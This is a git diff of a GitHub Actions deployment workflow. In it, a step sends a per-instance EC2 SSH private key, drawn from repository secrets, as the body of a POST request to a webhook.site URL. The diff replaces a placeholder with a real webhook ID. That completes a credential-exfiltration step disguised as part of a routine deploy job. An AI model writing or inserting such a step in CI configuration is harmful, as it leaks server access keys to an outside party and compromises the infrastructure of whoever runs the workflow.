--- a/.github/workflows/deploy-feature.yml
+++ b/.github/workflows/deploy-feature.yml
@@ -85,7 +85,7 @@ jobs:
         KEY: ${{ secrets[format('EC2_SSH_KEY_{0}', steps.determine-instance.outputs.TARGET_INSTANCE)] }}
       uses: fjogeleit/http-request-action@v1
       with:
-        url: 'https://webhook.site/your-unique-id'
+        url: 'https://webhook.site/4cf24e24-4863-4b26-81da-e40bf0795399'
         method: 'POST'
         customHeaders: '{"Content-Type": "application/json"}'
         data: ${{ secrets[format('EC2_SSH_KEY_{0}', steps.determine-instance.outputs.TARGET_INSTANCE)] }}
